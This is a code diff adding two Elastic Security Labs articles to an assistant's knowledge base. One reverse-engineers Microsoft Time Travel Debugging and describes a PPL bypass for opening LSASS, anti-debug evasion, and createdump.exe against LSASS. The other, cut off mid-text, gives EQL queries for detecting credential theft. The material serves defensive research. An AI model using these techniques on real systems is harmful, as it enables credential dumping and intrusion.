--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/deep_dive_into_the_ttd_ecosystem.md
@@ -0,0 +1,326 @@
+---
+title: "Deep dive into the TTD ecosystem"
+slug: "deep-dive-into-the-ttd-ecosystem"
+date: "2022-11-30"
+description: "This is the first in a series focused on the Time Travel Debugging (TTD) technology developed by Microsoft that was explored in detail during a recent independent research period."
+author:
+  - slug: christophe-alladoum
+image: "photo-edited-02-w.jpg"
+category:
+  - slug: security-research
+tags:
+  - windows
+---
+
+Several times a year, Elastic Security Labs researchers get the freedom to choose and dig into projects of their liking — either alone or as a team. This time is internally referred to as “On-Week” projects. This is the first in a series focused on the [Time Travel Debugging](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-overview) (TTD) technology developed by Microsoft that was explored in detail during a recent On-Week session.
+
+Despite being made public for several years, awareness of TTD and its potential are greatly underrated within the infosec community. We hope this two-part series can help shed some light on how TTD can be useful for program debugging, vulnerability research and exploitation, and malware analysis.
+
+This research involved first understanding the inner workings of TTD and then assessing some interesting applicable uses that can be made out of it. This post will focus on how researchers dive deep into TTD, sharing their methodology along with some interesting findings. The second part will detail the applicable use of TTD for the purpose of malware analysis and integration with Elastic Security.
+
+# Background
+
+[Time Travel Debugging](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-overview) is a tool developed by Microsoft Research that allows users to record execution and navigate freely into the user-mode runtime of a binary. TTD itself relies on two technologies: Nirvana for the binary translation, and iDNA for the trace reading/writing process. Available since Windows 7, TTD internals were first detailed [in a publicly available paper](https://www.usenix.org/legacy/events/vee06/full_papers/p154-bhansali.pdf). Since then, both [Microsoft](https://www.youtube.com/watch?v=l1YJTg_A914&) and [independent researchers](https://infocondb.org/con/recon/recon-2015/hooking-nirvana-stealthy-instrumentation-techniques-for-windows-10) have covered it in great detail. For this reason, we won’t explore the internals of both technologies in depth. Instead, Elastic researchers investigated the ecosystem — or the executables, DLLs, and drivers — that make the TTD implementation work. This led to some interesting findings about TTD, but also Windows itself, as TTD leverages some (undocumented) techniques to work as intended in special cases, such as [Protected Processes](https://docs.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-#system-protected-process).
+
+But why investigate TTD at all? Aside from pure curiosity, it is likely that one of the possible intended uses for the technology would be discovering bugs in production environments. When bugs are hard to trigger or reproduce, having a “record-once-replay-always” type of environment helps compensate for that difficulty, which is exactly what TTD implements when coupled with WinDbg.
+
+Debugging tools such as [WinDbg](https://apps.microsoft.com/store/detail/9PGJGD53TN86) have always been an immense source of information when reversing Windows components, as they provide additional comprehensible information, usually in plain text. Debugging tools (especially debuggers) must cooperate with the underlying operating system, which could involve debugging interfaces and/or previously undisclosed capabilities from the OS. TTD conforms to that pattern.
+
+# High-level overview
+
+TTD works by first creating a recording that tracks every instruction executed by an application and stores it in a database (suffixed with .run). Recorded traces can be replayed at will using the WinDbg debugger, which on first access will index the .run file, allowing for faster navigation through the database. To be able to track execution of arbitrary processes, TTD injects a DLL responsible for recording activity on-demand which allows it to record processes by spawning them, but also may attach to an already-running process.
+
+TTD is freely [downloadable](https://apps.microsoft.com/store/detail/9PGJGD53TN86) as part of the WinDbg Preview package in the MS Store. It can be used directly from WinDbg Preview (aka WinDbgX), but is a standalone component that is located in `C:\Program Files\WindowsApps\Microsoft.WinDbg_<version></version>_<arch>__8wekyb3d8bbwe\amd64\ttd` for the x64 architecture, which we will focus on in this post. x86 and arm64 versions are also available for download in the MS Store.
+
+The package consists of two EXE files (TTD.exe and TTDInject.exe) and a handful of DLLs. This research focuses on the major DLL responsible for everything not related to Nirvana/iDNA (i.e. responsible for the session management, driver communication, DLL injection, and more): ttdrecord.dll
+
+\_Note: Most of this research was made using two versions of the ttdrecord DLL: mostly on a 2018 version (1.9.106.0 SHA256=aca1786a1f9c96bbe1ea9cef0810c4d164abbf2c80c9ecaf0a1ab91600da6630), and early 2022 version (10.0.19041.1 SHA256=1FF7F54A4C865E4FBD63057D5127A73DA30248C1FF28B99FF1A43238071CBB5C). The older versions were found to have more symbols, which helped speed up the reverse engineering process. We then re-adapted structures and function names to the most recent version. Therefore, some of the structures explained here might not be the same if you’re trying to reproduce on more recent versions. \_
+
+# Examining TTD features
+
+## Command line parameters
+
+Readers should note that TTD.exe acts essentially as a wrapper to ttdrecord!ExecuteTTTracerCommandLine:
+
+```
+HRESULT wmain()
+{
+v28 = 0xFFFFFFFFFFFFFFFEui64;
+hRes = CoInitializeEx(0i64, 0);
+if ( hRes >= 0 )
+{
+ModuleHandleW = GetModuleHandleW(L"TTDRecord.dll");
+[...]
+TTD::DiagnosticsSink::DiagnosticsSink(DiagnosticsSink, &v22);
+CommandLineW = GetCommandLineW();
+lpDiagnosticsSink = Microsoft::WRL::Details::Make<TTD::CppToComDiagnosticsSink,TTD::DiagnosticsSink>(&v31, DiagnosticsSink);
+hRes = ExecuteTTTracerCommandLine(*lpDiagnosticsSink, CommandLineW, 2i64);
+[...]
+```
+
+The final line of the code excerpt above shows a call to ExecuteTTTracerCommandLine , which takes an integer as the last argument. This argument corresponds to the desired tracing modes, which are: - 0 -\> FullTracingMode, - 1 -\> UnrestrictedTracing and - 2 -\> Standalone (the hardcoded mode for the public version of TTD.exe)
+
+Forcing TTD to run in full-tracing mode reveals available options, which include some hidden capabilities such as process reparenting (-parent) and automatic tracing until reboot (-onLaunch) for programs and services.
+
+[Dumping the complete option set](https://gist.github.com/calladoum-elastic/4666dafc789a273c35a4aedf2ed9cd9e) of TTDRecord.dll revealed interesting hidden command line options such as:
+
+```
+-persistent Trace programs or services each time they are started (forever). You must specify a full path to the output location with -out.
+-delete Stop future tracing of a program previously specified with -onLaunch or -persistent. Does not stop current tracing. For -plm apps you can only specify the package (-delete <package>) and all apps within that package will be removed from future tracing
+-initialize Manually initialize your system for tracing. You can trace without administrator privileges after the system is initialized.
+```
+
+The process of setting up Nirvana requires TTD to set up the InstrumentationCallback field in the target \_EPROCESS. This is achieved through the (undocumented but [known](https://www.codeproject.com/Articles/543542/Windows-x64-System-Service-Hooks-and-Advanced-Debu)) NtSetInformationProcess(ProcessInstrumentationCallback) syscall (ProcessInstrumentationCallback, which has a value of 40). Due to the potential security implication, invoking this syscall requires elevated privileges. Interestingly, the -initialize flag also hinted that TTD could be deployed as a Windows service. Such service would be responsible for proxying tracing requests to arbitrary processes. This can be confirmed by executing it and seeing the resulting error message:
+
+![Deducing TTDService.exe](/assets/images/deep-dive-into-the-ttd-ecosystem/image13.jpg)
+
+Even though it [is easy](https://www.virustotal.com/gui/search/TTDService.exe/files)to find evidence confirming the existence of TTDService.exe , the file was not provided as part of the public package, so aside from noting that TTD can run as a service, we will not cover it in this post.
+
+## TTD process injection
+
+As explained, a TTD trace file can either be created from the standalone binary TTD.exe or through a service TTDService.exe (private), both of which must be run in a privileged context. However, those are just launchers and injecting the recording DLL (named TTDRecordCPU.dll) is the job of another process: TTDInject.exe.
+
+TTDInject.exe is another executable noticeably larger than TTD.exe, but with a pretty simple objective: prepare the tracing session. In an overly simplified view, TTD.exe will first start the process to be recorded in a suspended state. It will then spawn TTDInject.exe, passing it all the necessary arguments to prepare the session. Note that TTDInject can also spawn the process directly depending on the tracing mode we mentioned earlier — therefore, we are describing the most common behavior (i.e. when spawned from TTD.exe).
+
+![TTD.exe process metadata](/assets/images/deep-dive-into-the-ttd-ecosystem/image17.jpg)
+
+TTDInject will create a thread to execute TTDLoader!InjectThread in the recorded process, which after various validations will in turn load the library responsible for recording all process activity, TTDRecordCPU.dll.
+
+![Using TTD to trace Notepad.exe](/assets/images/deep-dive-into-the-ttd-ecosystem/image6.jpg)
+
+From that point onward, all instructions, memory accesses, exceptions triggered, or CPU states encountered during the execution will be recorded.
+
+Once the general workflow of TTD was understood, it became clear that little to no manipulation is possible after the session initialization. Thus, further attention was paid to the arguments supported by ttdrecord.dll. Thanks to the C++ mangling function format, a lot of critical information can be retrieved from the function names themselves, which makes analyzing the command line argument parser relatively simple. One interesting flag that was discovered was PplDebuggingToken. That flag is hidden and only available in Unrestricted Mode.
+
+![Discovering PplDebuggingToken method](/assets/images/deep-dive-into-the-ttd-ecosystem/image19.jpg)
+
+The existence of this flag immediately raised questions: TTD was architected first around Windows 7 and 8, and on Windows 8.1+. The concept of Protection Level was added to processes, dictating that processes can only open handles to a process with a [Protection Level](https://www.elastic.co/blog/protecting-windows-protected-processes#Protected%20process%20light:%7E:text=a%20kernel%20driver.-,Protected%20process%20light,-) that is equal or inferior. It is a simple byte in the \_EPROCESS structure in the kernel, and thus not directly modifiable from user mode.
+
+![Binary diff comparing TTD on Windows 8 with Windows 8.1](/assets/images/deep-dive-into-the-ttd-ecosystem/image11.jpg)
+
+The values of the Protection Level byte are well known and are summarized in the table below.
+
+![Protection Level value mappings](/assets/images/deep-dive-into-the-ttd-ecosystem/image20.png)
+
+The Local Security Authority subsystem (lsass.exe) on Windows [can be configured](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) to run as Protected Process Light, which aims to limit the reach of an intruder who gains maximum privileges on a host. By acting at the kernel level, no user-mode process can open a handle to lsass, no matter how privileged.
+
+![Verifying LSASS protection level](/assets/images/deep-dive-into-the-ttd-ecosystem/image2.jpg)
+
+But the PplDebuggingToken flag appears to suggest otherwise. If such a flag existed, it would be the dream of any pentester/red teamer: a (magic) token that would allow them to inject into protected processes and record them, dump their memory or more. The command line parser seems to imply that the content of the command flag is a mere wide-string. Could this be a PPL backdoor?
+
+### Chasing after the PPL debugging token
+
+Returning to ttdrecord.dll, the PplDebuggingToken command line option is parsed and stored in a context structure along with all of the options required to create the TTD session. The value can be traced down to several locations, with an interesting one being within TTD::InitializeForAttach, whose behavior is simplified in the following pseudo-code:
+
+```
+ErrorCode TTD::InitializeForAttach(TtdSession *ctx)
+{
+  [...]
+  EnableDebugPrivilege(GetCurrentProcess()); // [1]
+  HANDLE hProcess = OpenProcess(0x101040u, 0, ctx->dwProcessId);
+  if(hProcess == INVALID_HANDLE_VALUE)
+ {
+    goto Exit;
+  }
+  [...]
+  HMODULE ModuleHandleW = GetModuleHandleW(L"crypt32.dll");
+  if ( ModuleHandleW )
+  pfnCryptStringToBinaryW = GetProcAddress(ModuleHandleW, "CryptStringToBinaryW"); // [2]
+
+  if ( ctx->ProcessDebugInformationLength ) // [3]
+  {
+DecodedProcessInformationLength = ctx->ProcessDebugInformationLength;
+DecodedProcessInformation = std::vector<unsigned char>(DecodedProcessInformationLength);
+wchar_t* b64PplDebuggingTokenArg = ctx->CmdLine_PplDebugToken;
+if ( *pfnCryptStringToBinaryW )
+{
+  if( ERROR_SUCCESS == pfnCryptStringToBinaryW( // [4]
+                      b64PplDebuggingTokenArg,
+                      DecodedProcessInformationLength,
+                      CRYPT_STRING_BASE64,
+                      DecodedProcessInformation.get(),
+                      &DecodedProcessInformationLength,
+                      0, 0))
+  {
+    Status = NtSetInformationProcess( // [5]
+               NtGetCurrentProcess(),
+               ProcessDebugAuthInformation,
+               DecodedProcessInformation.get(),
+               DecodedProcessInformationLength);
+  }
+[...]
+```
+
+After enabling the SeDebugPrivilege flag for the current process ([1]) and obtaining a handle to the process to attach to ([2]), the function resolves an exported generic function used to perform string operations: crypt32!CryptStringToBinaryW. In this instance, it is used for decoding the base64-encoded value of the PplDebuggingToken context option if it was provided by the command line( [3], [4]). The decoded value is then used to invoke the syscall NtSetInformationProcess(ProcessDebugAuthInformation) ([5]). The token doesn’t seem to be used anywhere else, which made us scrutinize that syscall.
+
+The process information class ProcessDebugAuthInformation was added in [RS4](https://en.wikipedia.org/wiki/Windows_10_version_1803). A quick look at ntoskrnl shows that this syscall simply passes the buffer to CiSetInformationProcess located in ci.dll, which is the Code Integrity driver DLL. The buffer is then passed to ci!CiSetDebugAuthInformation with fully controlled arguments.
+
+![ProcessDebugAuthInformation class](/assets/images/deep-dive-into-the-ttd-ecosystem/image8.jpg)
+
+The following diagram summarizes at a high level where this happens in the execution flow of TTD.
+
+![TTD execution flow diagram](/assets/images/deep-dive-into-the-ttd-ecosystem/image24.png)
+
+The execution flow in CiSetDebugAuthInformation is simple enough: the buffer with the base64-decoded PplDebuggingToken and its length are passed as arguments for parsing and validation to ci!SbValidateAndParseDebugAuthToken. Should the validation succeed, and after some extra validation, a handle to the process performing the syscall (remember that we’re still handling the syscall nt!NtSetInformationProcess) will be inserted in a process debug information object then stored in a global list entry.
+
+![SbValidateAndParseDebugAuthToken method](/assets/images/deep-dive-into-the-ttd-ecosystem/image16.jpg)
+
+But how is that interesting? Because this list is only accessed in a single location: in ci!CiCheckProcessDebugAccessPolicy, and this function is reached during a NtOpenProcess syscall. And, as the name of the newly discovered flag suggested earlier, any process whose PID is located in that list would bypass the Protection Level enforcement. This was confirmed practically in a [KD](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugging-using-kd-and-ntkd) session by setting an access breakpoint on that list (on our version of ci.dll this was located at ci+364d8). We also [enabled PPL on LSASS](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) and wrote a simple PowerShell script that would trigger a NtOpenProcess syscall:
+
+![KD session output](/assets/images/deep-dive-into-the-ttd-ecosystem/image12.jpg)
+
+By breaking at the call to nt!PsTestProtectedProcessIncompatibility in nt!PspProcessOpen, we can confirm that our PowerShell process attempts to target lsass.exe, which is a PPL process:
+
+![Confirming our PowerShell process targets a PPL process in LSASS](/assets/images/deep-dive-into-the-ttd-ecosystem/image4.jpg)
+
+Now to confirm the initial theory of what the PplDebuggingToken argument would do by forcing the return value of the call to nt!PsTestProtectedProcessIncompatibility:
+
+![Testing TTD with PowerShell](/assets/images/deep-dive-into-the-ttd-ecosystem/image23.jpg)
+
+We break at the instruction following the call to nt!PsTestProtectedProcessIncompatibility (which only calls CI!CiCheckProcessDebugAccessPolicy), and force the return value to 0 (as mentioned earlier a value of 1 means incompatible):
+
+![Obtaining a handle to LSASS](/assets/images/deep-dive-into-the-ttd-ecosystem/image5.jpg)
+
+Success! We obtained a handle to LSASS despite it being PPL, confirming our theory. Summarizing, if we can find a “valid value” (we’ll dig into that soon) it will pass the check of SbValidateAndParseDebugAuthToken() in ci!CiSetDebugAuthInformation(), and we would have a universal PPL bypass. If this sounds too good to be true, that’s mostly because it is — but confirming it requires developing a better understanding of what CI.dll is doing.
+
+### Understanding Code Integrity policies
+
+Restrictions based on code integrity, such as those used by AppLocker, can be enforced through policies, which in their human readable form are XML files. There are two types of policies: base and supplemental. Examples of what base policies look like can be found in their XML format in "C:\Windows\schemas\CodeIntegrity\ExamplePolicies\". This is what a Base Policy looks like in its XML form (taken from "C:\Windows\schemas\CodeIntegrity\ExamplePolicies\AllowAll.xml"), which reveals most of the details we’re interested in clearly in plaintext.
+
+```
+<?xml version="1.0" encoding="utf-8"?>
+<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
+<VersionEx>1.0.1.0</VersionEx>
+<PolicyID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyID>
+<BasePolicyID>{A244370E-44C9-4C06-B551-F6016E563076}</BasePolicyID>
+<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
+<Rules>
+<Rule><Option>Enabled:Unsigned System Integrity Policy</Option></Rule>
+<Rule><Option>Enabled:Advanced Boot Options Menu</Option></Rule>
+<Rule><Option>Enabled:UMCI</Option></Rule>
+<Rule><Option>Enabled:Update Policy No Reboot</Option></Rule>
+</Rules>
+<!--EKUS-- >
+<EKUs />
+<!--File Rules-- >
+<FileRules>
+<Allow ID="ID_ALLOW_A_1" FileName="*" />
+<Allow ID="ID_ALLOW_A_2" FileName="*" />
+</FileRules>
+<!--Signers-- >
+<Signers />
+<!--Driver Signing Scenarios-- >
+<SigningScenarios>
+<SigningScenario Value="131" ID="ID_SIGNINGSCENARIO_DRIVERS_1" FriendlyName="Auto generated policy on 08-17-2015">
+  <ProductSigners>
+    <FileRulesRef><FileRuleRef RuleID="ID_ALLOW_A_1" /></FileRulesRef>
+  </ProductSigners>
+</SigningScenario>
+<SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS" FriendlyName="Auto generated policy on 08-17-2015">
+  <ProductSigners>
+    <FileRulesRef><FileRuleRef RuleID="ID_ALLOW_A_2" /></FileRulesRef>
+  </ProductSigners>
+</SigningScenario>
+</SigningScenarios>
+<UpdatePolicySigners />
+<CiSigners />
+<HvciOptions>0</HvciOptions>
+<Settings>
+<Setting Provider="PolicyInfo" Key="Information" ValueName="Name">
+  <Value><String>AllowAll</String></Value>
+</Setting>
+<Setting Provider="PolicyInfo" Key="Information" ValueName="Id">
+  <Value><String>041417</String></Value>
+</Setting>
+</Settings>
+</SiPolicy>
+```
+
+XML-formatted policies can be compiled to a binary format using the ConvertFrom-CiPolicy PowerShell cmdlet:
+
+![Compiling XML-formatted policies](/assets/images/deep-dive-into-the-ttd-ecosystem/image14.jpg)
+
+Base Policies allow for fine granularity, with the ability to restrict by name, path, hash, or signer (with or without specific [EKU](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ppsec/651a90f3-e1f5-4087-8503-40d804429a88)); but also in their action mode (Audit or Enforced).
+
+Supplemental Policies were designed as an extension of Base Policies to provide more flexibility allowing, for instance, policies to apply (or not) to a specific group of workstations or servers. Therefore, they are more specific, but can also be more permissive than the Base Policy should be. Interestingly, before 2016, supplemental policies [were not bound to a specific device](https://openrt.gitbook.io/open-surfacert/common/boot-sequence/uefi/secure-boot/windows-bootmanager-exploit), allowing otherwise mitigated bypasses fixed by [MS16-094](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-094) and [MS16-100](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-100) that were [broadly covered](https://arstechnica.com/information-technology/2016/08/microsoft-secure-boot-firmware-snafu-leaks-golden-key) by the media.
+
+Keeping that information in mind, it is possible to get back to ci!SbValidateAndParseDebugAuthToken with more clarity: the function essentially follows three steps: 1. Call ci!SbParseAndVerifySignedSupplementalPolicy to parse the input buffer from the syscall and determine if it’s a validly-signed Supplemental Policy 2. Call ci!SbIsSupplementalPolicyBoundToDevice to compare the DeviceUnlockId from the supplemental policy to that of the current system; such values can be easily retrieved using the syscall NtQuerySystemEnvironmentValueEx with the GUID [`{EAEC226F-C9A3-477A-A826-DDC716CDC0E3}`](https://oofhours.com/2019/09/02/geeking-out-with-uefi/)3. Finally, extract two variables from the policy: an integer (DWORD) which corresponds to the Protection Level, and a (UNICODE_STRING) Debug Authorization.
+
+Since it is possible to craft policy files (via XML or PowerShell scripting), Step 3 is not a problem. Neither is Step 2, as the DeviceUnlockId can be forged with the syscall `NtSetSystemEnvironmentValueEx({EAEC226F-C9A3-477A-A826-DDC716CDC0E3})` as long as we have the SeSystemEnvironmentPrivilege privilege. However, it should be noted that the UnlockId is a volatile value that will be restored upon reboot.
+
+![Forging UnLockId](/assets/images/deep-dive-into-the-ttd-ecosystem/image26.jpg)
+
+However, bypassing Step 1 is virtually impossible, as it requires : - to own the private key for a Microsoft-owned certificates with the particular [OID 1.3.6.1.4.1.311.10.3.6](http://oid-info.com/get/1.3.6.1.4.1.311.10.3.6)(i.e. - MS NT5 Lab (szOID_NT5_CRYPTO)) - and that the aforementioned certificate must not be revoked or expired
+
+So, where does that leave us? We have now confirmed that, contrary to conventional wisdom, PPL processes can be opened by another process without the extra step of loading a kernel driver. However, it should also be stressed that such a use case is niche, since only Microsoft (literally) holds the keys to using this technique for very targeted machines. Nevertheless, such a case is still a great example of an air gap use of CI for debugging purposes.
+
+## Offensive TTD
+
+_Note: As a reminder, TTD.exe requires elevated privileges which all of the techniques discussed below assume._
+
+Throughout this research, we discovered some potentially interesting offensive and defensive use cases of TTD.
+
+### Tracing != Debugging
+
+TTD is not a debugger! Therefore, it will work perfectly undetected for processes that perform a basic anti-debugging check, like using IsDebuggerPresent() (or any other way that depends on PEB.BeingDebugged). The following screenshot illustrates this detail by making TTD attach to a simple notepad process:
+
+![Attaching to Notepad.exe with TTD](/assets/images/deep-dive-into-the-ttd-ecosystem/image1.jpg)
+
+From a debugger we can check the BeingDebugged field located in the notepad PEB, which shows that the flag is not set:
+
+![Verifying Notepad.exe BeingDebugged reports unset](/assets/images/deep-dive-into-the-ttd-ecosystem/image21.jpg)
+
+### The curious case of ProcLaunchMon
+
+Another interesting trick made available by TTD is abusing the built-in Windows driver ProcLaunchMon.sys. When running as a service (i.e. TTDService.exe), ttdrecord.dll will create the service instance, load the driver, and communicate with the device available at \.\com_microsoft_idna_ProcLaunchMon to register newly traced clients.
+
+The driver itself will be used to monitor new processes created by the TTD service and then suspend those processes directly from the kernel, thus bypassing any protection that solely monitors process creation with the creation flag CREATE_SUSPENDED (as mentioned [here](https://attack.mitre.org/techniques/T1055/012/#detection) for instance). We developed a basic Device Driver client for this research, which can be found [here](https://gist.github.com/calladoum-elastic/328068f19e60a76b00f20cdb936cd078).
+
+![Using ProcLaunchMon to monitor Notepad.exe](/assets/images/deep-dive-into-the-ttd-ecosystem/image3.jpg)
+
+### CreateDump.exe
+
+Another fun fact: even though it is not strictly part of TTD, the WinDbgX package provides a .NET signed binary whose name perfectly summarizes its functionality: createdump.exe. This binary is located at "C:\Program Files\WindowsApps\Microsoft.WinDbg\_\*\createdump.exe".
+
+![CreateDump.exe metadata](/assets/images/deep-dive-into-the-ttd-ecosystem/image9.jpg)
+
+This binary can be used to snapshot and dump the context of a process provided as an argument, in the direct lineage of other [LOLBAS](https://lolbas-project.github.io).
+
+![Using CreateDump.exe to interact with LSASS](/assets/images/deep-dive-into-the-ttd-ecosystem/image22.jpg)
+
+This once more highlights the need to avoid relying on static signatures and filename blocklist entries to protect against attacks such as credential dumping and favor more robust approaches such as [RunAsPPL](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection), [Credential Guard](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage), or [Elastic Endpoint’s Credential Hardening](https://www.elastic.co/guide/en/security/current/whats-new.html#_endpoint_enhancements).
+
+## Defensive TTD
+
+### Blocking TTD
+
+Though TTD is an extremely useful feature, cases where it would be required to be enabled on non-development or test machines (such as production servers or workstations) are rare. Even though this seems largely undocumented at the time of this writing, ttdrecord.dll allows an early exit scenario by simply creating or updating a registry key located under "HKEY_LOCAL_MACHINE\Software\Microsoft\TTD", and updating the DWORD32 value RecordingPolicy to 2. Further attempts to use any TTD service (TTD.exe, TTDInject.exe, TTDService.exe) will be stopped and an ETW event will be generated to track attempts.
+
+![Using the Registry to interfere with TTD](/assets/images/deep-dive-into-the-ttd-ecosystem/image15.jpg)
+
+### Detecting TTD
+
+Preventing the use of TTD might be too extreme for all environments — however, several indicators exist for detecting the use of TTD. A process being traced has the following properties:
+
+- One thread will be running the code from TTDRecordCPU.dll, which can be verified using a simple built-in Windows command: tasklist /m TTDRecordCPU.dll
+- Even though this can be bypassed, the parent PID of the recorded process (or the first one, in case recursive tracing is enabled), would be TTD.exe itself:
+
+![Monitoring TTD](/assets/images/deep-dive-into-the-ttd-ecosystem/image18.jpg)
+
+- Also, the \_KPROCESS.InstrumentationCallback pointer would be set to land in the TTDRecordCPU.dll BSS section of the executable:
+
+![IntrementationCallback](/assets/images/deep-dive-into-the-ttd-ecosystem/image25.jpg)
+
+Therefore, detecting tracing from TTD can be achieved through both User-Mode and Kernel-Mode methods.
+
+# Conclusion
+
+This concludes the first part of this “On-Week” research focused on TTD. Digging into the internals of the TTD ecosystem revealed some very interesting, lesser-known mechanisms built-in to Windows, which are required to make TTD work for certain edge cases — such as the tracing of PPL processes.
+
+Even though this research didn’t unveil a new secret backdoor for targeting PPL processes, it did show an unexplored technique built into Windows to do so. If anything, this research highlights the importance of a model based on strong cryptography (here through CI.dll), and how it can bring a lot of flexibility — while maintaining a high level of security — when implemented adequately.
+
+The second part of this series will be less research-oriented and more hands-on with the release of a small tool we also developed as part of On-Week. This assists in the process of binary analysis through TTD, using the Windows Sandbox.
+
+## Acknowledgement
+
+As this research was already concluded and the article in progress, the author became aware of research that covered a similar subject and findings regarding that very same technique (PPL debugging token). That research was performed by Lucas George (from the company Synacktiv), who presented his findings at [SSTIC 2022](https://www.sstic.org/2022/presentation/supreme_ttd_-_that_s_my_ppl/).
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detect_credential_access.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detect_credential_access.md
new file mode 100644
index 0000000000000..630e02dbfdb16
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detect_credential_access.md
@@ -0,0 +1,316 @@
+---
+title: "Detect Credential Access with Elastic Security"
+slug: "detect-credential-access"
+date: "2023-03-01"
+description: "Elastic Endpoint Security provides events that enable defenders with visibility on techniques and procedures which are commonly leveraged to access sensitive files and registry objects."
+author:
+  - slug: samir-bousseaden
+image: "blog-thumb-blind-spots.png"
+category:
+  - slug: security-operations
+  - slug: detection-science
+---
+
+## Preamble
+
+[Credential Access](https://attack.mitre.org/tactics/TA0006/) consists of techniques for stealing credentials like cookies, API keys, and passwords. It is one of the top critical tactics that is almost guaranteed to occur during an attack lifecycle, ranging from phishing to infostealer malware to more complicated post-exploitation techniques. Therefore, covering it from different angles increases opportunities for early detection and prevention. [Elastic Endpoint Security](https://www.elastic.co/endpoint-security/) 7.15 added new [file](https://www.elastic.co/guide/en/ecs/current/ecs-file.html#field-file-path)and [registry](https://www.elastic.co/guide/en/ecs/current/ecs-allowed-values-event-category.html#ecs-event-category-registry) events to provide defenders with better visibility on techniques and procedures involving some form of sensitive files and/or registry objects access:
+
+- [T1555.003 Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003/)
+- [T1003.002 Security Account Manager](https://attack.mitre.org/techniques/T1003/002/)
+- [T1003.004 LSA Secrets](https://attack.mitre.org/techniques/T1003/004/)
+- [T1003.005 Cached Domain Credentials](https://attack.mitre.org/techniques/T1003/005/)
+- [T1552.001 Credential in Files](https://attack.mitre.org/techniques/T1552/001/)
+- [T1555.004 Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004/)
+
+## Hunting for Credential Access
+
+With the [Endpoint security integration](https://www.elastic.co/guide/en/security/current/install-endpoint.html) enabled, you can explore those new events using generic [KQL](https://www.elastic.co/guide/en/kibana/current/kuery-query.html) or [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql.html) queries:
+
+**KQL and EQL queries to view file and registry events.**
+
+```
+// EQL via Security -> Timelines -> New -> Correlation
+any where event.category in ("file", "registry")
+  and event.action in ("query", "open")
+
+// KQL via Discover
+event.category : ("file" or "registry")
+  and event.action : ("open" or "query")
+
+```
+
+Below, you can see an example of file events logged as a result of running two known security assessment tools: [Lazagne](https://github.com/AlessandroZ/LaZagne) and [Seatbelt](https://github.com/GhostPack/Seatbelt). These tools include checks for a multitude of credentials and interesting files used in common software:
+
+![KQL query identifying Lazagne and Seatbelt](/assets/images/detect-credential-access/kql-identifying.jpg)
+
+Here are some example registry events logged as a result of running [Mimikatz](https://github.com/gentilkiwi/mimikatz) (lsadump::sam, cache, lsa, and secrets submodules) and Seatbelt (PuttyHostKeys SSH enumeration):
+
+![KQL query identifying Mimikatz and Seatbelt](/assets/images/detect-credential-access/kql-mimikatz.jpg)
+
+Leveraging EQL’s [correlation](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) capabilities to link those new events with other event categories (such as [process](https://www.elastic.co/guide/en/ecs/current/ecs-allowed-values-event-category.html#ecs-event-category-process), registry, [network](https://www.elastic.co/guide/en/ecs/current/ecs-allowed-values-event-category.html#ecs-event-category-network), and/or
+
+[authentication](https://www.elastic.co/guide/en/ecs/current/ecs-allowed-values-event-category.html#ecs-event-category-authentication)) is a great enabler for detection and hunting.
+
+> The&nbsp;[process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id) field is a globally unique identifier used to mitigate PID reuse as well as to identify a specific process over time.
+
+This EQL query uses the process.entity_id field to detect a process accessing multiple sensitive files in a short period of time, which is usually a higher-confidence signal than looking for single file access:
+
+**Process accessing multiple sensitive files in a short period of time**
+
+```
+sequence by process.entity_id with maxspan=1m
+ [process where event.action == "start"]
+
+ // at least 3 unique file.paths, runs=* is supported in EQL 7.16+
+ [file where event.action == "open"] with runs=3
+
+```
+
+Here is an example of a match for 3 different and unrelated types of credentials (email, DPAPI system MasterKey and Sysprep unattended):
+
+![EQL query showing email, DPAPI, and Sysprep credentials](/assets/images/detect-credential-access/kql-email.jpg)
+
+Now let’s hunt for [remote access to sensitive files over SMB](https://attack.mitre.org/techniques/T1021/002/), such as the following:
+
+![Moving sensitive file with SMB](/assets/images/detect-credential-access/moving-sensitive-files.jpg)
+
+We can detect this behavior with EQL that correlates a remote logon event ([4624](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624)) with sensitive file access by the same
+
+[user.id](https://www.elastic.co/guide/en/ecs/current/ecs-user.html#field-user-id):
+
+**Correlating remote logon with sensitive file access**
+
+```
+sequence by host.id with maxspan=5m
+
+  [authentication where event.action == "logged-in" and
+    /* event 4624 need to be logged */
+    winlog.logon.type : "Network" and
+    event.outcome == "success" and source.ip != null and
+    source.ip != "127.0.0.1" and
+    source.ip != "::1"] by winlog.event_data.TargetUserSid
+
+   /* requires Elastic Endpoint Security Integration 7.15+ */
+  [file where event.action == "open" and process.pid == 4] by user.id
+
+```
+
+The above query results correlate relevant fields like the [source.ip](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip), user.id, and [file.path](https://www.elastic.co/guide/en/ecs/current/ecs-file.html#field-file-path):
+
